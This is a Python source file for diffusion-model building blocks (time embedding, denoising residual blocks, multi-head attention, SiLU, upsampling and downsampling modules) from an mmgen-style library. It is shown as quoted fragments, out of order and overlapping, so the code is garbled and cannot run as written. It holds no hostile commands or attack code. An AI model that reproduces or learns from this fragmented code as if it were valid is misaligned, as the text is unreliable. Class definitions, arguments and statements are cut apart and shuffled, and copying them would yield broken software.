to None. act_cfg (dict, optional):", "in the attention. norm_cfg (dict, optional): Config for normalization layer. Default to ``dict(type='GN',", "1-D tensor shape as ``[bz, ]``, one per batch element. dim (int): The", "self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size ==", "torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() *", "output channels of the ResBlock. If not defined, the output channels will equal", "in_channels (int): Number of channels of the input feature map to be downsampled.", "to apply an additional convolution layer after the nearest interpolation operation. Args: in_channels", "downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module):", "Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network.", "= torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight", "the children that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\"", "not equals to `out_channels`, a learnable shortcut with conv layers will be added.", "torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from", "operation. Args: in_channels (int): Number of channels of the input feature map to", "with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self,", "embedding. Defaults to None. act_cfg (dict, optional): Config for activation layer. Defaults to", "use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift", "layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x =", "in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return", "= self.conv_2(x) return x + shortcut def init_weights(self): # apply zero init to", "an embedding function, then feed to neural networks. Args: in_channels (int): The channel", "Otherwise, the output of Embedding layer will be added with the input before", "also known as the swish function. Args: input (bool, optional): Use inplace operation", "layers. out_channels (int, optional): Number of output channels of the ResBlock. If not", "nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg", "+ scale) + shift``. Otherwise, the output of Embedding layer will be added", "embeddings to the children that support it as an extra input. Modified from", "additional convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True):", "feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x,", "to ``out * (1 + scale) + shift``. Otherwise, the output of Embedding", "in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg),", "x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or shared", "inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks =", "* self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h", "layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t))", "if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding,", "__init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg,", "map to be downsampled. with_conv (bool, optional): Whether apply an additional convolution layer", "The channel number of the input feature map. embedding_channels (int): The channel number", "(bool, optional): Whether apply an additional convolution layer after upsampling. Defaults to `True`.", "`SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000):", "Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is also known as", "= nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3", "1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function for SiLU.", "'shift' and map the output of normalization layer to ``out * (1 +", "network. Support average pooling and convolution for downsample operation. Args: in_channels (int): Number", "\"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network.", "max_period (int, optional): Controls the minimum frequency of the embeddings. Defaults to ``10000``.", "of channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding`", "of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout", "minimum frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape", "torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation", "= out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3", "each other. Originally ported from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66.", "\"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential(", "x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\"", "MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to the", "optional): The kernel size for the shortcut conv. Defaults to ``1``. \"\"\" def", "if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg,", "to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None. act_cfg", "= torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x * (1 +", "x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer,", "embedding or shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\"", "re-shift and re-scale normalization results. Otherwise, embedding results will directly add to input", "from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES,", "of channels of the input embedding. norm_cfg (dict, optional): Config for the normalization", "x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor):", "self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding", "Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module()", "\"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1):", "layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift ==", "norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2", "Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the", "\"\"\"An attention block allows spatial position to attend to each other. Originally ported", "build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels,", "x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature map to downsample.", "an additional convolution layer after the nearest interpolation operation. Args: in_channels (int): Number", "inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut conv. Defaults to", "self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x", "3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale,", "time embedding. Defaults to None. act_cfg (dict, optional): Config for activation layer. Defaults", "by an embedding function, then feed to neural networks. Args: in_channels (int): The", "c, *spatial = x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv", "+ shortcut def init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1],", "= qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale =", "= self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1)", "embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict, optional): Config", "nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor):", "\"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape", "\"\"\"A sequential module that passes timestep embeddings to the children that support it", "found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function for SiLU. Args:", "= dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) /", "= layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies", "\\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x", "interpolation operation. Args: in_channels (int): Number of channels of the input feature map", "layer will be added with the input before normalization operation. Defaults to True.", "import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class", "self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input", "= torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:,", "(torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module):", "# noqa Args: in_channels (int): Channels of the input feature map. num_heads (int,", "== 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time", "element-wise. The SiLU function is also known as the swish function. Args: input", "`in_channels` not equals to `out_channels`, a learnable shortcut with conv layers will be", "tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift =", "num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels,", "of the embedding. max_period (int, optional): Controls the minimum frequency of the embeddings.", "the output of Embedding layer will be split to 'scale' and 'shift' and", "add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None:", "@staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv,", "build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1", "with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def", "`use_scale_shift == True`, embedding results will be chunked and used to re-shift and", "for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x):", "self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x", "(float): Probability of the dropout layers. out_channels (int, optional): Number of output channels", "if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported", "Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock", "nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels,", "embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to", "num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels)", "attend to each other. Originally ported from here, but adapted to the N-d", "return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not", "self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x,", "in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1)", "\"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time", "to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace:", "of \\'SiLU\\' is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace", "nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_", "`3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if", "embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for", "self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v =", "nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and `3`", "\"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after", "qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b,", "or shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding", "embedding_channels (int): The channel number of the output embedding. embedding_mode (str, optional): Embedding", "Shared time embedding or shared label embedding. Returns: torch.Tensor : Output feature map", "Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer", "Use inplace operation or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__()", "= nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod", "be added. Args: in_channels (int): Number of channels of the input feature map.", "map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y)", "function for time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps", "in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function", "\"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns:", "of the input feature map. embedding_channels (int): The channel number of the output", "import deepcopy from functools import partial import mmcv import numpy as np import", "import partial import mmcv import numpy as np import torch import torch.nn as", "self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self): # apply", "self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module(", "Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self: if", "out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is", "\"\"\"Upsampling operation used in the denoising network. Allows users to apply an additional", "isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module()", "assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and `3` for", "use_scale_shift (bool): If True, the output of Embedding layer will be split to", "x * (1 + scale) + shift else: x = self.norm(x + embedding)", "embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) #", "known as the swish function. Args: input (bool, optional): Use inplace operation or", "\"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x) return x", "for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time", "'scale' and 'shift' and map the output of normalization layer to ``out *", "in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 =", "tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x", "or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ <", "embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm =", "Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial = x.shape x", "config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() ==", "the input embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to", "allows spatial position to attend to each other. Originally ported from here, but", "function for upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor:", "def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two", "def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature map", "to neural networks. Args: in_channels (int): The channel number of the input feature", "All rights reserved. from copy import deepcopy from functools import partial import mmcv", "qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1", "shortcut def init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1], 0)", "``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads", "return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor):", "nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward", "If not defined, the output channels will equal to the `in_channels`. Defaults to", "support `SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim,", "h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial) def", "as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for", "Originally ported from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa", "map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module()", "equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for", "channels of the input embedding. norm_cfg (dict, optional): Config for the normalization operation.", "Unit (SiLU) function, element-wise. The SiLU function is also known as the swish", "activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of", "x = self.norm(x) x = x * (1 + scale) + shift else:", "shift``. Otherwise, the output of Embedding layer will be added with the input", "x = self.conv_2(x) return x + shortcut def init_weights(self): # apply zero init", "mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module", "'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding,", "If `use_scale_shift == True`, embedding results will be chunked and used to re-shift", "Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half = dim //", "optional): Whether use convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self,", "if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x,", "h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h", "2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args =", "# apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module):", "np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(),", "__init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1)", "of heads in the attention. norm_cfg (dict, optional): Config for normalization layer. Default", "Embedding layer will be split to 'scale' and 'shift' and map the output", "torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial = x.shape x =", "head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after", "t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns:", "embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\"", "r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is also", "time by an embedding function, then feed to neural networks. Args: in_channels (int):", "level embedding. First embedding time by an embedding function, then feed to neural", "Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one", "for time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding.", "and map the output of normalization layer to ``out * (1 + scale)", "+ shift``. Otherwise, the output of Embedding layer will be added with the", "N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input feature", "norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None", "Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample =", "self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args:", "Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x", "super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to", "Number of channels of the input feature map to be downsampled. with_conv (bool,", "`[bz, dim]`. \"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period) *", "with the input before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels,", "for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel", "but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding =", "@MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding. First embedding", "The SiLU function is also known as the swish function. Args: input (bool,", "class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will", "input feature map. embedding_channels (int): The channel number of the output embedding. embedding_mode", "spatial position to attend to each other. Originally ported from here, but adapted", "torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS", "\"\"\"Forward function for time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor:", "Args: in_channels (int): Channels of the input feature map. num_heads (int, optional): Number", "(dict, optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg", "embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_)", "nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature", "upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv", "x + shortcut def init_weights(self): # apply zero init to last conv layer", "= [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg", "output of Embedding layer will be added with the input before normalization operation.", "return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows", "(int, optional): Controls the minimum frequency of the embeddings. Defaults to ``10000``. Returns:", "to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults to", "output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional):", "= h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial)", "self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2", "True`, embedding results will be chunked and used to re-shift and re-scale normalization", "to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half =", "self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h =", "embedding. max_period (int, optional): Controls the minimum frequency of the embeddings. Defaults to", "operation or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__", "from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep", "input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability", "dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k", "else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear", "of Embedding layer will be added with the input before normalization operation. Defaults", "out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels)", "self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj =", "self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users", "3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for", "re-scale normalization results. Otherwise, embedding results will directly add to input of normalization", "learnable shortcut with conv layers will be added. Args: in_channels (int): Number of", "the input feature map. embedding_channels (int) Number of channels of the input embedding.", "x = layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module):", "embedding layer, reference to Two level embedding. First embedding time by an embedding", "in the denoising network. Support average pooling and convolution for downsample operation. Args:", "Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\"", "map. embedding_channels (int): The channel number of the output embedding. embedding_mode (str, optional):", "`dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU',", "dim=1) x = self.norm(x) x = x * (1 + scale) + shift", "the input feature map. num_heads (int, optional): Number of heads in the attention.", "`None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults too ``dict(type='GN',", "denoising network. Allows users to apply an additional convolution layer after the nearest", "self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1`", "normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the", "will be added with the input before normalization operation. Defaults to True. \"\"\"", "x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used", "`dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will be", "(int): Number of channels of the input feature map to be downsampled. with_conv", "reserved. from copy import deepcopy from functools import partial import mmcv import numpy", "(bool): If True, the output of Embedding layer will be split to 'scale'", "\"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels`", "out_channels (int, optional): Number of output channels of the ResBlock. If not defined,", "Allows users to apply an additional convolution layer after the nearest interpolation operation.", "optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If", "out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3", "h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj,", "to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if", "\"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version", "Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x =", "embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ 